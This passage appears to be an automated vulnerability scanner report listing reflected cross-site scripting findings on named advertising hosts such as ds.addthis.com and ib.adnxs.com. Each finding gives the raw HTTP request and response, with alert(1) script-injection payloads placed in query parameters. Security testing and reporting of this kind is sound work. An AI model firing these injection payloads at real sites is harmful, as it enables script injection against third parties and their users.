GET /red/psi/sites/www.marqui.com/p.json?callback=_ate.ad.hpr66809<script>alert(1)</script>0ed15865e19&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.marqui.com%2Fcompany%2Fcontact-us%2F&ref=http%3A%2F%2Fwww.marqui.com%2F&18q07bs HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1302308295.60|1302308295.1FE|1302197723.66; dt=X; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 459
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 09 Apr 2011 00:22:00 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 09 May 2011 00:22:00 GMT; Path=/
Set-Cookie: di=%7B%7D..1302308520.1FE|1302308520.60|1302308520.66; Domain=.addthis.com; Expires=Mon, 08-Apr-2013 00:21:59 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 09 Apr 2011 00:22:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:22:00 GMT
Connection: close

_ate.ad.hpr66809<script>alert(1)</script>0ed15865e19({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d97b40ad252fd37","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2fwww.marqui.
...[SNIP]...

1.80. http://ds.addthis.com/red/psi/sites/www.wcax.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.wcax.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 63658<script>alert(1)</script>12e32e4184e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.wcax.com/p.json?callback=_ate.ad.hpr63658<script>alert(1)</script>12e32e4184e&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.wcax.com%2F&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18196&1dw210o HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1302308519.1FE|1302308519.60|1302308519.66; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 09 Apr 2011 12:31:40 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 09 May 2011 12:31:40 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 09 Apr 2011 12:31:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 12:31:40 GMT
Connection: close

_ate.ad.hpr63658<script>alert(1)</script>12e32e4184e({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

1.81. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4f34'-alert(1)-'106a47e4832 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=KFyPwvUoDkApXI_C9SgOQAAAAMDMzARAKVyPwvUoDkApXI_C9SgOQMhZn8QGScMa8f5MdWfsOnidU6BNAAAAAEchAAC1AAAANQEAAAIAAADbfgQA0WMAAAEAAABVU0QAVVNEACwB-gAwC1UA4gUBAgUCAAQAAAAATSLwCgAAAAA.&tt_code=vert-16&udj=uf%28%27a%27%2C+537%2C+1302352797%29%3Buf%28%27c%27%2C+5740%2C+1302352797%29%3Buf%28%27r%27%2C+294619%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..c4f34'-alert(1)-'106a47e4832&referrer=http://www.wcax.com/Global/category.asp&pp=TaBTnQAErxsK5XIEsatUZyS2vMMbWLuZP7exLA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6bkQnVOgTZveEoTklQfnqK2NC-_675oCp439xBqP_I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzsgEMd3d3LndjYXguY29tugEKMzAweDI1MF9hc8gBCdoBL2h0dHA6Ly93d3cud2NheC5jb20vR2xvYmFsL2NhdGVnb3J5LmFzcD9DPTE4ODM2mALoG8ACBMgCq4KlDqgDAegDEOgD1CroA-cC9QMAAABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxndgaio4wOQ4d3JMhys8mZPCymmQ%26client%3Dca-pub-2103553853082603%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370791&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352790373&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352791028&frm=0&adk=2815960337&ga_vid=1677852705.1302352791&ga_sid=1302352791&ga_hid=1970402529&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2F&fu=0&ifi=1&dtd=812&xpc=EGUpOMD3fC&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+MKcwNVSg=5pzOC9sG0dNO`q1.s%0ZSmbwg(RhLciH$_wXF3XdwLK.u3aCLlp@j>1hAYNN5fRn-rmn+)s$jI#-<oCZH-<fW]>8dl2O`L>m-GjsWE)wQW!g/$iN0C/R-zRMG(@QX[6sAVV2f_>.x0w4>`Ot/^cC@>9QVM'Y@6U@1+N3(; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 10-Apr-2011 12:40:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 12:40:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 09 Apr 2011 12:40:46 GMT
Content-Length: 1196

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=exSuR-F6DEB7FK5H4XoMQAAAAMDMzARAKVyPwvU
...[SNIP]...
19%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..c4f34'-alert(1)-'106a47e4832&referrer=http://www.wcax.com/Global/category.asp">
...[SNIP]...

1.82. http://ib.adnxs.com/ab [referrer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25e56'-alert(1)-'8288101d5af was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=KFyPwvUoDkApXI_C9SgOQAAAAMDMzARAKVyPwvUoDkApXI_C9SgOQMhZn8QGScMa8f5MdWfsOnidU6BNAAAAAEchAAC1AAAANQEAAAIAAADbfgQA0WMAAAEAAABVU0QAVVNEACwB-gAwC1UA4gUBAgUCAAQAAAAATSLwCgAAAAA.&tt_code=vert-16&udj=uf%28%27a%27%2C+537%2C+1302352797%29%3Buf%28%27c%27%2C+5740%2C+1302352797%29%3Buf%28%27r%27%2C+294619%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..&referrer=http://www.wcax.com/Global/category.asp25e56'-alert(1)-'8288101d5af&pp=TaBTnQAErxsK5XIEsatUZyS2vMMbWLuZP7exLA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6bkQnVOgTZveEoTklQfnqK2NC-_675oCp439xBqP_I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzsgEMd3d3LndjYXguY29tugEKMzAweDI1MF9hc8gBCdoBL2h0dHA6Ly93d3cud2NheC5jb20vR2xvYmFsL2NhdGVnb3J5LmFzcD9DPTE4ODM2mALoG8ACBMgCq4KlDqgDAegDEOgD1CroA-cC9QMAAABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxndgaio4wOQ4d3JMhys8mZPCymmQ%26client%3Dca-pub-2103553853082603%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370791&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352790373&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352791028&frm=0&adk=2815960337&ga_vid=1677852705.1302352791&ga_sid=1302352791&ga_hid=1970402529&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2F&fu=0&ifi=1&dtd=812&xpc=EGUpOMD3fC&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+MKcwNVSg=5pzOC9sG0dNO`q1.s%0ZSmbwg(RhLciH$_wXF3XdwLK.u3aCLlp@j>1hAYNN5fRn-rmn+)s$jI#-<oCZH-<fW]>8dl2O`L>m-GjsWE)wQW!g/$iN0C/R-zRMG(@QX[6sAVV2f_>.x0w4>`Ot/^cC@>9QVM'Y@6U@1+N3(; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 10-Apr-2011 12:40:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 12:40:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 09 Apr 2011 12:40:50 GMT
Content-Length: 1196

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=exSuR-F6DEB7FK5H4XoMQAAAAMDMzARAKVyPwvU
...[SNIP]...
62113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..&referrer=http://www.wcax.com/Global/category.asp25e56'-alert(1)-'8288101d5af">
...[SNIP]...

1.83. http://ib.adnxs.com/ab [tt_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the tt_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f02d'-alert(1)-'ada50828606 was submitted in the tt_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=KFyPwvUoDkApXI_C9SgOQAAAAMDMzARAKVyPwvUoDkApXI_C9SgOQMhZn8QGScMa8f5MdWfsOnidU6BNAAAAAEchAAC1AAAANQEAAAIAAADbfgQA0WMAAAEAAABVU0QAVVNEACwB-gAwC1UA4gUBAgUCAAQAAAAATSLwCgAAAAA.&tt_code=vert-165f02d'-alert(1)-'ada50828606&udj=uf%28%27a%27%2C+537%2C+1302352797%29%3Buf%28%27c%27%2C+5740%2C+1302352797%29%3Buf%28%27r%27%2C+294619%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%2C+25553%29%3B&cnd=!rhTiMQjsLBDb_REYACDRxwEoVTEAAACw9SgOQEITCAAQABgAIAEo_v__________AUgAUABYsBZgAGi1Ag..&referrer=http://www.wcax.com/Global/category.asp&pp=TaBTnQAErxsK5XIEsatUZyS2vMMbWLuZP7exLA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6bkQnVOgTZveEoTklQfnqK2NC-_675oCp439xBqP_I6PDAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzsgEMd3d3LndjYXguY29tugEKMzAweDI1MF9hc8gBCdoBL2h0dHA6Ly93d3cud2NheC5jb20vR2xvYmFsL2NhdGVnb3J5LmFzcD9DPTE4ODM2mALoG8ACBMgCq4KlDqgDAegDEOgD1CroA-cC9QMAAABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxndgaio4wOQ4d3JMhys8mZPCymmQ%26client%3Dca-pub-2103553853082603%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370791&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352790373&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352791028&frm=0&adk=2815960337&ga_vid=1677852705.1302352791&ga_sid=1302352791&ga_hid=1970402529&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2F&fu=0&ifi=1&dtd=812&xpc=EGUpOMD3fC&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+MKcwNVSg=5pzOC9sG0dNO`q1.s%0ZSmbwg(RhLciH$_wXF3XdwLK.u3aCLlp@j>1hAYNN5fRn-rmn+)s$jI#-<oCZH-<fW]>8dl2O`L>m-GjsWE)wQW!g/$iN0C/R-zRMG(@QX[6sAVV2f_>.x0w4>`Ot/^cC@>9QVM'Y@6U@1+N3(; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 10-Apr-2011 12:40:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 12:40:33 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 09 Apr 2011 12:40:33 GMT
Content-Length: 1196

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=exSuR-F6DEB7FK5H4XoMQAAAAMDMzARAKVyPwvU
...[SNIP]...
3J5LmFzcD9DPTE4ODM2mALoG8ACBMgCq4KlDqgDAegDEOgD1CroA-cC9QMAAABE9QMgAAAAgAa-s939482e0DA%26num%3D1%26sig%3DAGiWqtxndgaio4wOQ4d3JMhys8mZPCymmQ%26client%3Dca-pub-2103553853082603%26adurl%3D&tt_code=vert-165f02d'-alert(1)-'ada50828606&udj=uf%28%27a%27%2C+537%2C+1302352797%29%3Buf%28%27c%27%2C+5740%2C+1302352797%29%3Buf%28%27r%27%2C+294619%2C+1302352797%29%3Bppv%28783%2C+%271928465358862113224%27%2C+1302352797%2C+1302784797%2C+5740%
...[SNIP]...

1.84. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ba50'%3balert(1)//c512c095fc5 was submitted in the redir parameter. This input was echoed as 4ba50';alert(1)//c512c095fc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.foxnews&size=300x250&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.foxnews%2Ftier2_031010%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.{PRICEBUCKET}%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D1302538878%3F4ba50'%3balert(1)//c512c095fc5 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIiXoQChgBIAEoATCf1YztBBCf1YztBBgA; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb171130=5_[r^208WM6[kCcE/qX3lJExr?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zP3vuRz0wYHU38f5MdWfsOnifKqNNAAAAAMY5AwA3AQAAfAAAABkAAACfsAMAoVsAAAEAAABVU0QAVVNEACwB-gCqAQAAzwgBAgUCAAUAAAAAQyTfEQAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198711%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12090145724922326,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5778,%5C%22spendCreativeId%5C%22:198711,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd168.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12090145724922326%5EMEDIA6_DATA%5Efoo=bar; path=/; expires=Tue, 12-Apr-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9!z6W0Jrx!wQ.y=fCzU_Fs2'gkKKA]$O/KPf+4#*[KxO?)Y+Ak9VRY_MNh'tM#U*cRYEl@2:-O`/[wF!*+([77te'#0GB_^*%p-G=(Y`j^:P![4#GOC0ScY4Jwaue1E-1EQ$(U65?I_<[c2-MxCu29ZR'!lUHN)-0<$VDu]IKM.kOO7].tJEH.9>4=0r(J`qtK'J; path=/; expires=Sun, 10-Jul-2011 16:21:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 16:21:51 GMT
Content-Length: 521

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.foxnews/tier2_031010;net=cm;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=280882;contx=none;an=100;dc=w;btg=;ord=1302538878?4ba50';alert(1)//c512c095fc5">
...[SNIP]...

1.85. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 220c2<script>alert(1)</script>abfd15efa4b was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=E05511220c2<script>alert(1)</script>abfd15efa4b HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc2dfb1&0&&4d9d35c9&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc2dfbd&0&&4d9d2f40&00f8712b16a2747053422af6cef97d9a; rtc_33wk=MLuBO6+ht4kWQAcYCwq3qvGtUKGrBZ8doDP9+JcCeOOzqVD+we0MdrEy1Q9wVOPnx3+D9JMtHr3sXfzNw3d1fHSsgQ0j1PMA3u0A65h1Zdx44dhHS5+AaIPoFOSkJCsUdawtp/+wPz4ovCW6/jlMSWl5gugGYoVzCFcXDgXPFV44jOFQ9OvWXmsv0TUYz+5nkUCtLLzUzXTh7M+zWyh9Os1EVo5VMh5rHTjjZnK71873pcHYYzezCHZTM/2+0SL4Kjk8dPShfwkCSnJWFkNsK0MzXgFnrllh6u548CifcAFwE1rm2D91a3IypBzg; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc2dfda&0&&4d9c03eb&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPNOUllLgIQVp2RxvqihGlAFSS4kHOeU66DJ0MOK5EzOCS2EByYfg7Qrqibp15G8KTrDuD6DAQkoQrdkdlzUiguejeRGfCSakzCoHZKm/jYrxQbkP1M3eZsdsuqc+uLh77lb/zkdFc3E54U2MEX2fHfbhfnLsMGeW5DWmK1KT64FYIE9CapbZj+AZ0UnNTmtUbpdxDL/rVbtchfPfF47acMHxbgs3BSVlWVsirz+chCnZgnJ1SCiD9YAA==; 